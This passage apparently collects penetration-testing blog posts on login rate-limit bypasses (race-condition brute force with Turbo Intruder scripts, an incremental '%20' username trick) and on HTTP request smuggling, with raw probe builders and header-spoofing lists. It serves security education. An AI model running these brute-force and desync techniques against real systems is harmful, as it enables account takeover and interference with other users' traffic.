-
Rate-Limit Evasion Through Race Condition
About the blog
Author: Nachiket Rathod
Genre: Web Application
Objective: Bypassing a robust login rate-limiting mechanism through Race Condition.
TL;DR: Breaking the Limit
We encountered a secure login rate-limiting mechanism that blocks access for a set duration after multiple failed login attempts. Standard bypass methods failed, like trying to pick a digital lock with a toothpick 😜, but with persistence and a creative problem-solving approach, the rate limit was successfully bypassed, reinforcing the importance of perseverance in security testing. 🚀
Challenges 🔐
We tried all the known methods, but no luck!
Attempted Bypasses:
Using Special Characters: ❌
Null Byte (%00) at the end of the email.
Common characters that can help bypass rate limits:
%0d, %2e, %09, %0, %00, %0d%0a, %0a, %0C, %20.
Adding HTTP Headers & IP Spoof: ❌
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Investigating Rate Limiting Mechanism: 🕵️♂️
After exploring all known methods, an analysis was conducted to understand how the rate limiting was implemented. Requests were intercepted, and a brute-force attempt was made using Burp Intruder. Over 100 different password combinations were tested. Upon completing the attack, it was observed that the application enforced rate limiting after three unsuccessful attempts, displaying the error message: "Too many incorrect attempts. Please try again later after 10 minutes."
Race Condition: 🏃
Race conditions are a common security vulnerability related to business logic flaws. They happen when a website processes multiple requests at the same time without proper safeguards. This allows different threads to access and modify the same data simultaneously, leading to conflicts or unexpected behaviour. In a race condition attack, an attacker sends carefully timed requests to trigger these conflicts and manipulate the application for malicious purposes.
👉 The key challenge in exploiting race conditions is ensuring that multiple requests are processed simultaneously with minimal timing differences, ideally within 1 millisecond or less.
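To make that window concrete, here is a minimal Python simulation (the NaiveRateLimiter class, the three-attempt limit, and the password values are illustrative, not the target's actual code): when concurrent requests all pass the "remaining attempts" check before any of them records a failure, far more than three attempts get processed.

```python
import threading
import time

class NaiveRateLimiter:
    """Hypothetical rate limiter with a check-then-use race window."""
    def __init__(self, attempts=3):
        self.remaining = attempts

    def try_login(self, password):
        if self.remaining <= 0:        # check
            return "locked out"
        time.sleep(0.2)                # simulated processing gap
        self.remaining -= 1            # use
        return "ok" if password == "s3cret" else "wrong password"

limiter = NaiveRateLimiter()
barrier = threading.Barrier(20)
results = []

def attempt(pw):
    barrier.wait()                     # release all 20 requests at once
    results.append(limiter.try_login(pw))

threads = [threading.Thread(target=attempt, args=("guess",)) for _ in range(19)]
threads.append(threading.Thread(target=attempt, args=("s3cret",)))
for t in threads:
    t.start()
for t in threads:
    t.join()
# Far more than 3 attempts get through before the counter catches up,
# and the request carrying the valid password succeeds.
```

This is why the responses in the attack below show negative "remaining attempts" values: every parallel request read the counter before any of them decremented it.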
HTTP/2: Single-Packet Attack vs. HTTP/1.1: Last-Byte Synchronization
👉 HTTP/2: Allows two requests to be sent over a single TCP connection, minimizing network jitter. However, due to server-side variations, relying on just two requests may not consistently trigger a race condition.
👉 HTTP/1.1: Last-Byte Sync: Enables pre-sending most of the data for 20-30 requests, holding back a small portion, and then releasing it simultaneously to force synchronized processing on the server.
Steps for Last-Byte Sync Preparation:
1.) Send request headers and body, leaving out the final byte, while keeping the stream open.
2.) Pause for 100ms after the initial send.
3.) Disable TCP_NODELAY to leverage Nagle’s algorithm, ensuring final frames are batched.
4.) Send a ping to warm up the connection.
5.) Release the withheld frames, ensuring they arrive in a single packet (verifiable via Wireshark).
Note: This method is ineffective for static files, as they are not typically involved in race condition exploits.
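The preparation steps above can be sketched with plain sockets (simplified: no TLS and no ping frame; the function names and arguments are my own):

```python
import socket
import time

def withhold_last_byte(req: bytes):
    """Split a raw request so its final byte can be withheld."""
    return req[:-1], req[-1:]

def last_byte_sync(host, port, requests, hold=0.1):
    """Pre-send every request minus its final byte, pause, then release
    all withheld bytes back-to-back. Requires network access, so it is
    defined here but not invoked."""
    conns = []
    for req in requests:
        s = socket.create_connection((host, port))
        # Value 0 disables TCP_NODELAY, re-enabling Nagle's algorithm
        # so the tiny final writes get batched together.
        s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 0)
        head, tail = withhold_last_byte(req)
        s.sendall(head)
        conns.append((s, tail))
    time.sleep(hold)                   # let the pre-sent data settle
    for s, tail in conns:
        s.sendall(tail)                # release the withheld bytes
    return [s for s, _ in conns]
```

In practice, tools like Burp's "send group in parallel" or Turbo Intruder handle this synchronization for you; the sketch just shows where the withheld byte sits.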
🔹 Adapting to Server Architecture:
Understanding the target’s architecture is key. Front-end servers may route requests differently, affecting timing. Sending harmless pre-requests can help normalize request timing by warming up server-side connections.
🔹 Handling Session-Based Locking:
Some frameworks, like PHP’s session handler, serialize requests per session, making vulnerabilities harder to detect. Using unique session tokens for each request can bypass this restriction and improve attack timing.
🔹 Overcoming Rate or Resource Limits:
If connection warming doesn’t work, intentionally flooding the server with dummy requests can trigger rate or resource limit delays. This can create conditions favorable for a single-packet attack, increasing the chances of a successful race condition exploit.
The Attack: 🪓
🔭 The Manual Approach
Step-1: Intercept the application’s login request and send it to Intruder; then send the request and observe the normal request and its response using valid credentials.
Fig 1: Observe the valid request and response.
Step-2: Send the request to Intruder, select the password position, and choose the Sniper attack type. Enter the password combinations, including one valid password with the rest invalid. Launch the attack and, upon completion, observe the remaining attempts in the response.
Fig 2: Observe the remaining attempts.
Step-3: Navigate to the third request in Intruder and examine the response to check the remaining attempts.
Fig 3: Observe the remaining attempts: Zero.
Step-4: As in Step-3, navigate to the 100th request (the one with the valid password) and observe its response.
Fig 4: Observe the remaining attempts: Zero.
Step-5: Now, for the manual Race-Condition attack, create 100 tabs in Repeater, with one valid password and the rest as invalid. Use Burp’s Create Group feature to combine all the tabs into a single group.
Fig 5: Screenshot shows the Create/Edit Group feature.
Step-6: The first 99 tabs contain incorrect passwords; only the last tab has the valid one. Now select Send group in parallel (single-packet attack), then click the Send button to dispatch all requests in the group.
Fig 6: Screenshot shows single-packet attack.
Step-7: Observe the remaining attempts in the response. For example, in this case, the first tab shows -40.
Fig 7: Screenshot shows the error message with 401 with remaining attempts.
Step-8: Navigate to any other tabs and observe that the same remaining attempts value appears in the response. For example, in the screenshot below, the value is -79.
Fig 8: Screenshot shows the error message with 401 with remaining attempts.
Step-9: Navigate to the last tab and observe that the request containing the correct password received a valid response with a user token.
Fig 9: Screenshot shows the success response.
🔭 The Automated Approach 👉 Turbo Intruder
🔹This section demonstrates a method to exploit a race condition vulnerability in a login page by utilizing Turbo Intruder, an advanced HTTP request engine designed for high-speed and parallel attacks.
🔹The provided Python script uses Turbo Intruder’s request engine to perform a brute-force attack by sending multiple login attempts in parallel. These requests are queued and dispatched simultaneously through a single gate mechanism, leveraging a single-packet attack technique to bypass conventional rate limiting and account lockout protections.
def queueRequests(target, wordlists):
    # If the target supports HTTP/2, use Engine.BURP2 to trigger the single-packet attack
    # If they only support HTTP/1, use Engine.THREADED or Engine.BURP instead
    # For more information: https://portswigger.net/research/smashing-the-state-machine
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    # Assign a list of candidate payloads from the clipboard
    payloads = wordlists.clipboard  # Ensure you copy a wordlist to your clipboard

    # The 'gate' argument withholds part of each request until openGate is invoked
    # If you see a negative timestamp, the server responded before the request was complete
    for password in payloads:  # Iterate through the password wordlist
        engine.queue(target.req % password, gate='race1')  # Inject the payload into the request

    # Once every 'race1'-tagged request has been queued, send them in sync
    engine.openGate('race1')


def handleResponse(req, interesting):
    table.add(req)
⌛ Script 👉 Multiple Gates
def queueRequests(target, wordlists):
    # Use HTTP/2 for a single-packet attack
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,  # Allow parallel request queuing
                           engine=Engine.BURP2)

    # Get passwords from the clipboard
    passwords = wordlists.clipboard

    # Use multiple gates to avoid Turbo Intruder's 99-request limit
    max_per_gate = 50  # Adjust based on testing
    gate_index = 1
    current_gate = "race" + str(gate_index)
    count = 0

    for password in passwords:
        engine.queue(target.req % password, gate=current_gate)
        count += 1
        # Once we reach the max_per_gate limit, switch to a new gate
        if count % max_per_gate == 0:
            engine.openGate(current_gate)  # Release the current batch
            gate_index += 1
            current_gate = "race" + str(gate_index)

    # Ensure the last (partial) batch is sent
    if count % max_per_gate != 0:
        engine.openGate(current_gate)


def handleResponse(req, interesting):
    table.add(req)
🔹This approach targets systems vulnerable to TOCTOU (Time-of-Check to Time-of-Use) flaws, where concurrent requests may result in a successful login even if traditional defenses are in place. When one of the synchronized requests contains valid credentials, the race condition may allow unauthorized access before the system processes invalid attempts. This technique is particularly effective against applications that do not implement proper concurrency control during authentication checks.
Step-10: Copy the list of passwords from the Notepad file.
Fig 10: Screenshot showing the passwords copied to the clipboard.
Step-11: Select the password value from the Repeater tab and send the request to Turbo Intruder. The selected password will automatically be replaced with %s as a placeholder for payload injection.
Fig 11: Screenshot shows the python script for the single-packet attack.
Step-12: Navigate to any random Queue ID (with an incorrect password) and observe the “remaining attempts” value in the response. Example: in the screenshot below, it shows -21.
Fig 12: Screenshot showing the remaining attempts value in negative.
Step-13: Navigate to any other Queue ID where the actual remaining attempts are reflected accurately. Example: In the screenshot below, it displays 0.
Fig 13: Screenshot shows the actual remaining attempts
Step-14: Navigate to the last Queue ID (102) where the actual response is received. This confirms that the brute-force attack was successfully executed using Turbo Intruder through a single-packet attack by sending all requests in parallel.
Fig 14: Screenshot shows the successful single-packet attack.
⚠️ Turbo Intruder Limitations & Fixes
1. Internal Request Batching
Turbo Intruder appears to have an undocumented batching threshold (typically around 99–100 requests).
Requests queued beyond this threshold may be silently dropped, even if engine.openGate() is used.
2. concurrentConnections=1 Causes Queuing Bottlenecks
With only a single connection, all requests are funneled sequentially.
This may lead to:
❌ Delayed request delivery
❌ Dropped requests
❌ Improper synchronization
3. HTTP/2 Multiplexing Limits
Targets using HTTP/2 via Engine.BURP2 may enforce concurrent stream limits.
Exceeding those limits results in:
🚫 Stream resets
🚫 Requests not processed or acknowledged
4. Single Gate Overload
Assigning all requests to the same gate (e.g., race1) can create internal processing issues.
After about 99 requests:
⚠️ The rest may be ignored silently
⚠️ The attack becomes incomplete or ineffective
Remediations and Best Practices
✅ 1. Use Multiple Gates to Distribute Load
# Example:
# gate1 => 0–49 passwords
# gate2 => 50–99 passwords
Assign a unique gate to each batch: race1, race2, race3, …
Call engine.openGate("raceX") after each batch is queued.
✅ 2. Increase concurrentConnections
concurrentConnections = 5 # or higher based on testing
Enables parallel streams.
Helps avoid throttling and improves throughput.
✅ 3. Avoid Assigning >100 Requests Per Gate
Try to keep batches around 90–100 requests max per gate to prevent internal drop issues.
Turbo Intruder performs better when batches are smaller and structured.
✅ 4. Monitor Request Timing
If response timestamps appear before request timestamps:
🕒 It indicates a race failure or premature server response.
Suggests the gate was not used correctly or the request was dropped.
✅ 5. Consider Server-Side Throttling
Although less likely, some targets may:
🛡️ Rate-limit connections
🛡️ Block excessive request bursts
Remediate by:
Adding small delays
Reducing batch size
Switching from BURP2 to THREADED engine if needed.
💡 Summary: Always break requests into smaller groups with unique gates and ensure that you monitor Turbo Intruder’s internal behavior. Tune the configuration based on how the target server handles stream multiplexing and rate limits.
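The "smaller groups with unique gates" advice boils down to a simple batching helper (an illustrative sketch; the function name is my own):

```python
def batched(payloads, size=50):
    """Yield (gate_number, batch) pairs so that each Turbo Intruder
    gate carries at most `size` requests."""
    for i in range(0, len(payloads), size):
        yield i // size + 1, payloads[i:i + size]

# 120 payloads split into gates race1 (50), race2 (50) and race3 (20)
batches = list(batched(list(range(120))))
```

Each yielded gate number maps onto a gate name such as "race1", "race2", and so on, which is exactly what the multiple-gates script above does inline.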
Conclusion:
It’s crucial not to give up when faced with login rate limiting on applications. If default methods prove ineffective, there are numerous alternative ways to bypass these limitations. By thinking outside the box and creating new methods, it’s possible to overcome even the most robust security measures. This adaptability underscores the importance of continuous vigilance and innovation in the field of security.
References:
Portswigger
-
Rate-Limit Evasion Through Pyramid Technique
About the blog
Author: Suresh Budarapu
Genre: Web Application
Objective: Bypassing a robust login rate-limiting mechanism through perseverance and innovative problem-solving.
TL;DR:
In a recent assessment of a web application’s security, a robust login rate-limiting mechanism was encountered. After several unsuccessful login attempts, the application blocked further access and displayed an error message. Despite this challenge, we explored various methods to bypass the mechanism. Initially, standard techniques didn’t work, but with determination and creative problem-solving, we successfully bypassed the rate-limiting mechanism. This experience emphasized the importance of perseverance and innovative thinking in overcoming complex security challenges.
Challenges 🔒
We tried all the known methods, but no luck!
~ Attempted Bypasses
Using Special Characters ❌
Null Byte (%00) at the end of the email.
Common characters that can help bypass rate limits:
%0d, %2e, %09, %0, %00, %0d%0a, %0a, %0C.
Adding HTTP Headers & IP Spoof: ❌
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Investigating Rate Limiting Mechanism: 🕵️♂️
After trying the known methods, we attempted to understand how the rate limiting was implemented. We intercepted the requests and tried to brute-force using Burp Intruder. We tested 180 different password combinations. After completing the attack, we observed that the application implemented rate limiting after 23 unsuccessful attempts, throwing the error message: 'Too many incorrect attempts. Please try again later.' This occurred even when entering a valid username.
Demonstrating the Attack: 🪓
Step-1:
Intercept the application’s login request and redirect it to the intruder.
Next, select the password position and choose the sniper-attack option.
Enter the password combinations and initiate the attack.
Upon completion of the attack, observe that the application threw an error message after multiple incorrect attempts, indicating the presence of proper rate limiting.
Fig 1. The application has implemented a request rate limit.
Step-2:
After completing the attack, attempt to enter the valid password in the repeated request, resulting in an error.
Despite entering the correct password, the error still persists.
Fig 2. Observe the response with a valid password.
Step-3:
Now, append the common character '%20' to the username parameter.
Surprisingly, this bypassed the rate-limiting and allowed logging into the application using the valid password even after numerous incorrect password attempts.
Fig 3. Observe the success response (redirection).
Step-4:
Perform the brute-force attack to find the valid password after adding '%20' to the username parameter.
Even after completing the brute force attack, the error message remained the same: 'Too many incorrect attempts. Please try again later.'
Unfortunately, adding the common character '%20' didn't work during the brute-force attack.
Fig 4. Observe the error message again.
Step-5:
Upon attempting a brute force attack, repeat Step-2 and observe the same error message.
Fig 5. Observe the same error message.
Step-6:
After a comprehensive analysis, a new method was attempted: incrementally adding '%20' in each request, which resulted in bypassing the rate-limiting of password attempts.
For example, in the first request, add '%20' once; in the second request, add it twice. Repeat this process up to 180 requests, with the final request containing 180 ‘%20’ characters.
Choose the Attack-type: Pitchfork.
Fig 6. Choose the attack type and payload positions.
Step-7:
Utilize the Python code below to generate the incremental ‘%20’ payloads.
# Initialize the pattern
pattern = "%20"
# Loop 180 times to print the pattern
for i in range(1, 181):
    # Print the pattern for the current iteration
    print(f"Time {i}: {pattern}")
    # Add another "%20" to the pattern for the next iteration
    pattern += "%20"
Utilize the generated payloads at position one, which corresponds to the username parameter.
Fig 7. Add the output as payloads.
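For reference, the same payload list can be produced directly as a Python list (a sketch; note that the literal text "%20" is appended to the parameter, not an actual space character):

```python
# One payload per request: request N carries N copies of the literal "%20".
payloads = ["%20" * i for i in range(1, 181)]
```

Paste the resulting values into the first (username) payload position, with the password wordlist in the second position, as the Pitchfork attack requires.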
Step-8:
Observe the last request after completing the attack, where '%20' was appended 180 times to the username parameter.
Fig 8. Observe the highlighted request.
Step-9:
Observe that the login rate limit was bypassed,
allowing valid credentials to be found after numerous unsuccessful password attempts.
Fig 9. Observe the success response
Conclusion:
It’s crucial not to give up when faced with login rate limiting on applications. If default methods prove ineffective, there are numerous alternative ways to bypass these limitations. By thinking outside the box and creating new methods, it’s possible to overcome even the most robust security measures. This adaptability underscores the importance of continuous vigilance and innovation in the field of security.
Ally:
Suresh Budarapu
-
HTTP request smuggling
About the blog
Author: Nachiket Rathod
Genre: Web Application
Objective: Understanding and analyzing HTTP request smuggling (HTTP Desync Attacks) and its critical security implications.
TL;DR:
In this blog we will discuss the nitty-gritty of HTTP request smuggling (HTTP Desync Attacks).
These vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users. This page covers the following segments of the vulnerability.
Synopsis
Core concepts
Methodology
Detecting-desync
Confirming-desync
Explore
1. Core concepts 👻
“Smashing into the Cell Next Door”
“Hiding Wookiees in HTTP”
What is HTTP Request Smuggling?
It's a technique for interfering with the way a website processes sequences of HTTP requests received from one or more users.
I've divided the concept into four parts.
- Front-end
- Back-end
- Content-Length
- Transfer-Encoding
Now let’s understand this vulnerability in depth.
First, we'll see how the front-end and back-end work.
Fig 1. End users, Front-end and Back-end.
1.) As end users, what can we directly see?
The answer is the front-end, right? Obviously, we can’t see the back-end or its processes.
2.) How do modern websites communicate with each other?
They communicate via a chain of web servers speaking HTTP over stream-based transport-layer protocols like TCP or TLS.
These streams (TLS/TCP) are heavily reused and follow the HTTP/1.1 keep-alive protocol.
~ Question - How does this protocol work?
Since TCP/TLS streams are heavily reused, every request is placed back to back on them, and each server parses the HTTP headers to identify where each request starts and stops.
So requests from all over the world come in, pass through this tiny tunnel of TLS/TCP streams to the back-end, and are then split up into individual requests.
~ Question - What could possibly go wrong here?
What if an attacker sends a deliberately crafted, ambiguous request, so that the front-end and back-end disagree about how long the message is?
Let’s understand this via the following example.
Fig 2. Attacker, Malicious prefix
Example:
In Fig 2 above, the blue block is the original request and the orange block is the malicious prefix.
Now, how will the attacker send an ambiguous request?
Answer: the attacker attaches the malicious prefix (orange block) to the original request (blue block); the ambiguous request first reaches the front-end server.
The front-end thinks the blue + orange block of data is one request, so it immediately forwards the whole thing to the back-end server.
The back-end, however, thinks the message finishes at the end of the blue block, so it treats the orange bit of data as the start of the next request and simply waits for that request to be completed.
~ Question - What’s going to complete that request?
Well, it could be someone else sending a request to the application. So an attacker can apply an arbitrary prefix to someone else’s request via smuggling; that’s the core primitive of this technique [see Fig 3].
Fig 3. Attacker, victim, Front-end and Back-end
How does request smuggling arise?
Most request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends:
1.) Content-Length header [CL]
2.) Transfer-Encoding header [TE]
Fig 4. Content-Length and Transfer-Encoding headers
Example:
Content-Length header: specifies the length of the message body in bytes. See Fig 4: there are six characters in the POST body, so the Content-Length header value is six.
Transfer-Encoding: useful when the length of the client request or server response is not known in advance.
It is used to specify that the message body uses chunked encoding, meaning the body contains one or more chunks of data. Each chunk consists of the chunk size in bytes (expressed in hexadecimal), followed by a newline, followed by the chunk contents. The message is terminated with a chunk of size zero.
Fig 4 contains three chunks of different sizes in bytes (hexadecimal),
each size followed by a CRLF (\r\n), followed by the chunk data/contents.
5\r\n         - chunk size in hex, followed by CRLF as a line separator.
Nihar\r\n     - first chunk: five bytes of data, so 5 is the
                hexadecimal chunk size of "Nihar" (the chunk data).
---------------------------------------------------------------------------
7\r\n         - chunk size in hex, followed by CRLF as a line separator.
Rathod \r\n   - second chunk: seven bytes of data, including one space
                after "Rathod", so 7 is the hexadecimal chunk size.
----------------------------------------------------------------------------
10\r\n        - chunk size in hex (0x10 = 16 decimal), followed by CRLF
                as a line separator.
is \r\n       - third chunk begins: 5 bytes, including the whitespace
                and the CRLF on the first row.
\r\n          - counts as 2 more bytes (\r\n) on its own line.
Nachiket.\r\n - 9 more bytes, including the period (.), bringing the
                chunk to 16 bytes total (hex 10).
0\r\n         - the message terminates with a chunk of size 0.
\r\n
Note: the Transfer-Encoding parser stops reading after the terminating chunk of size 0; that is why the last character of the body is the period (.).
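The chunk arithmetic above can be verified mechanically; `chunk_encode` below is my own helper name, not part of any HTTP library:

```python
def chunk_encode(parts):
    """Encode a list of byte strings as an HTTP/1.1 chunked body."""
    out = b""
    for part in parts:
        out += b"%x\r\n" % len(part) + part + b"\r\n"
    return out + b"0\r\n\r\n"  # terminating zero-length chunk

body = chunk_encode([b"Nihar", b"Rathod ", b"is \r\n\r\nNachiket."])
# The sizes come out as 5, 7 and 10 (0x10 == 16 bytes), matching Fig 4.
```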
Note:
+ Burp Suite automatically unpacks chunked encoding to make messages easier to view and edit.
+ Browsers do not normally use chunked encoding in requests, and it is normally seen only in server responses
As we know, the HTTP specification provides two different methods (CL and TE) for specifying the length of HTTP messages.
It is therefore possible for a single message to use both methods (CL & TE) at the same time, such that they conflict with each other.
The HTTP specification tries to prevent this problem by stating that if both the Content-Length and Transfer-Encoding headers are present, the Content-Length header should be ignored.
This might be sufficient to avoid ambiguity when only a single server is in play, but not when two or more servers are chained together. In that situation, problems can arise for two reasons:
Note:
+ Some servers do not support the Transfer-Encoding header in requests.
+ Some servers that do support the Transfer-Encoding header can be induced not to process it if the header is obfuscated in some way.
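For context, PortSwigger's research catalogues several obfuscated Transfer-Encoding variants that may cause one server in the chain to miss the header; a few of them as a quick reference list (not exhaustive):

```python
# A sample of obfuscated Transfer-Encoding headers from PortSwigger's
# "HTTP Desync Attacks" research.
TE_OBFUSCATIONS = [
    "Transfer-Encoding: xchunked",
    "Transfer-Encoding : chunked",
    "Transfer-Encoding: chunked\r\nTransfer-Encoding: x",
    "Transfer-Encoding:\tchunked",
    " Transfer-Encoding: chunked",
]
```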
So if the front-end and back-end servers behave differently in relation to the Transfer-Encoding header, they might disagree about the boundaries between successive requests, leading to a request smuggling attack.
How can we perform an HTTP request smuggling attack?
The attack involves placing both the Content-Length and Transfer-Encoding headers in a single request,
then manipulating the request so that the front-end and back-end servers process it differently.
Let’s understand the simple approaches
There are four basic approaches for checking whether a website is vulnerable to request smuggling:
1.) CL.CL: both the front-end and back-end servers use the Content-Length header.
2.) CL.TE: the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
3.) TE.CL: the front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.
4.) TE.TE: the front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
1. Desynchronizing: the classic approach CL.CL
Fig 5. Front-end and Back-end [CL.CL]
Fig 5 is an example of an ambiguous request, using the absolutely classic, old-school desynchronization technique.
In this example, we simply specify the Content-Length header (CL) twice.
The front-end uses CL = 6 –> it forwards the data up to and including the orange A (12345A) to the back-end.
The back-end uses CL = 5 –> it thinks the orange A is the start of the next request.
In the above example, the injected A corrupts the green user’s real request, and they will probably get a response along the lines of “Unknown method APOST”.
Note:
This technique is so old-school and classic that it doesn’t actually work on anything worth hacking these days.
2. Desynchronizing: the chunked approach CL.TE
Fig 6. Front-end and Back-end [CL.TE]
In Fig 6, the front-end checks the CL header and the back-end checks the TE header, so we can perform a simple HTTP request smuggling attack as follows:
The front-end checks the Content-Length, which is 13, so it reads the request body as the thirteen bytes from the 0 through the end of SMUGGLED.
The request then goes to the back-end.
The back-end starts reading from the first chunk size, which is stated to be 0, so it terminates the request right there.
The word SMUGGLED therefore remains unprocessed on the connection until the next (victim) request arrives.
Once the victim’s request arrives, they will get a response like Unknown method SMUGGLEDPOST.
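A CL.TE probe like the one in Fig 6 can be assembled as raw bytes (a sketch; the host name and helper name are hypothetical, and 13 is simply the length of "0\r\n\r\nSMUGGLED"):

```python
def build_cl_te_probe(host, prefix=b"SMUGGLED"):
    """Build a raw CL.TE request: the CL covers the whole body, but a
    chunked parser stops at the 0-size chunk, leaving `prefix` behind."""
    body = b"0\r\n\r\n" + prefix
    return (b"POST / HTTP/1.1\r\n"
            b"Host: " + host.encode() + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"Transfer-Encoding: chunked\r\n"
            b"\r\n" + body)

probe = build_cl_te_probe("vulnerable.example")
```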
3. Desynchronizing: the TE.CL approach
Fig 7. Front-end and Back-end [TE.CL]
In Fig 7, the front-end checks the TE header and the back-end checks the CL header.
Note:
+ To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.
The front-end server processes the Transfer-Encoding header, so it treats the entire message body as chunked.
It processes the first chunk, which is stated to be 8 bytes long (Fig 7), up to the start of the line following SMUGGLED.
It then processes the second chunk, which is stated to be zero-length, and so treats it as terminating the request.
The request is then forwarded on to the back-end server.
The back-end server processes the Content-Length header and determines that the request body is 3 bytes long: up to the start of the line following the 8 (including the \r\n).
The following bytes, starting with SMUGGLED, are left unprocessed, and the back-end server treats them as the start of the next request in the sequence.
Note:
+ This technique (TE.CL) works on quite a few systems, but we can exploit many more by making the Transfer-Encoding header slightly harder to spot, so that one system doesn't see it.
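The TE.CL request from Fig 7 can likewise be sketched in raw bytes (hypothetical helper and host; Content-Length: 3 covers exactly the "8\r\n" line, which is why Burp's auto-update of Content-Length must be disabled):

```python
def build_te_cl_probe(host, prefix=b"SMUGGLED"):
    """Build a raw TE.CL request: a chunked parser consumes both chunks,
    while a CL parser (CL = 3) stops after '8\\r\\n', leaving the rest."""
    body = (b"%x\r\n" % len(prefix)) + prefix + b"\r\n0\r\n\r\n"
    return (b"POST / HTTP/1.1\r\n"
            b"Host: " + host.encode() + b"\r\n"
            b"Content-Length: 3\r\n"
            b"Transfer-Encoding: chunked\r\n"
            b"\r\n" + body)

probe = build_te_cl_probe("vulnerable.example")
```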
4. Forcing Desync
Fig 8. Forcing Desync quirks
If a message is received with both a Transfer-Encoding header field and a Content-Length header field, the latter MUST be ignored. – RFC 2616
2. Methodology ⚛️
Fig 9. Methodology
The theory behind request smuggling is straightforward, but the number of uncontrolled variables and our total lack of visibility into what’s happening behind the front-end can cause complications.
3. Detecting Desync 🕵️
IMP:
To detect request smuggling vulnerabilities we have to issue an ambiguous request followed by a normal 'victim' request, then observe whether the latter gets an unexpected response.
However, this is extremely prone to interference; if another user's request hits the poisoned socket before our victim request, they'll get the corrupted response and we won't spot the vulnerability.
This means that on a live site with a high volume of traffic it can be hard to prove request smuggling exists without exploiting numerous genuine users in the process.
Even on a site with no other traffic, you'll risk false negatives caused by application-level quirks terminating connections.
So what's the detection strategy?
Send a sequence of messages that makes a vulnerable back-end system hang and time out the connection. This technique has few false positives and, most importantly, has virtually no risk of affecting other users.
Fig 10. Timing Techniques Example:1 and Example:2
Example-1:
1.) CL.CL –> [Back-end Response]
Reason: –> The front-end checks the CL, which is 6, so it measures the body up to the Q and forwards the request to the back-end.
Once the request reaches the back-end, it checks the CL again (also 6), reads up to the last character Q, and we get a normal response; everything is fine.
2.) TE.TE –> [Front-end Response]
Reason: –> The front-end checks the Transfer-Encoding header, reads the first chunk size, which is stated to be 3, and then reads the next line of chunk data, abc.
It then expects the next chunk size, but Q is not a valid chunk size, and no terminating chunk of size 0 appears in Example-1; that is why we get an error response from the front-end.
3.) TE.CL –> [Front-end response]
Reason: –> Same as [TE.TE]
4.) CL.TE –> [Timeout]
Reason: –> In Example-1 with this technique,
the front-end server uses the CL header, so it forwards only the blue part of the data to the back-end, omitting the Q.
The back-end server uses the TE header, so it processes the first chunk and then waits for the next chunk to arrive. This causes an observable time delay.
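The CL.TE timing check can be automated with a raw socket (a sketch: plain HTTP for brevity, helper names are my own; a read that only returns after the timeout suggests the back-end is waiting for more chunked data):

```python
import socket
import time

def build_cl_te_timing_probe(host):
    # Content-Length covers only "3\r\nabc"; a chunked back-end keeps
    # waiting for the rest of the body, causing an observable delay.
    body = b"3\r\nabc"
    return (b"POST / HTTP/1.1\r\n"
            b"Host: " + host.encode() + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"Transfer-Encoding: chunked\r\n"
            b"\r\n" + body)

def time_to_first_byte(host, probe, port=80, timeout=10):
    """Send the probe and measure time until the first response byte
    (or the timeout). Requires network access, so not invoked here."""
    start = time.monotonic()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(probe)
        try:
            s.recv(1)
        except socket.timeout:
            pass
    return time.monotonic() - start
```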
Example-2:
1.) CL.CL –> [Back-end response]
Reason: –> In Example-2 (on the right side), the front-end checks the CL header, which is 6 bytes:
0\r\n --> first 3 bytes
\r\n --> \r\n on its own separate line (2 bytes)
x --> the last byte of data
So it sends the whole request, up to the last orange character x, to the back-end.
The back-end checks the CL again and gives a normal response; everything is fine.
2.) TE.TE –> [Back-end Response]
Reason: –> Here the front-end checks the TE header, so it processes the first chunk size, which is 0, terminates the request there, and forwards it to the back-end.
The back-end checks the TE header again and, like the front-end, stops reading at the terminating chunk size 0. We get the normal response and everything is fine.
3.) TE.CL –> [Timeout]
Reason: –> The front-end server uses the TE header and forwards the blue part of the data to the back-end server (stopping at the terminating chunk size 0), omitting the x.
The back-end uses the CL header and expects more content in the message body, so it just waits for the remaining content to arrive. This causes an observable time delay.
Note:
+ The timing-based test for TE.CL vulnerabilities will potentially disrupt other application users if the application is vulnerable to the CL.TE variant of the vulnerability. So to be stealthy and minimize disruption, you should use the CL.TE test first and continue to the TE.CL test only if the first test is unsuccessful.
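The TE.CL timing probe from Example-2 can be sketched the same way. Again a minimal sketch with a placeholder host, assuming the front-end honors Transfer-Encoding:

```python
# Build the TE.CL timing probe from Example-2. The 6-byte body ends
# with a stray "x" after the terminating 0 chunk. A TE-based front-end
# forwards only "0\r\n\r\n" (5 bytes) and drops the "x"; a CL-based
# back-end, expecting 6 bytes, then waits for the missing byte,
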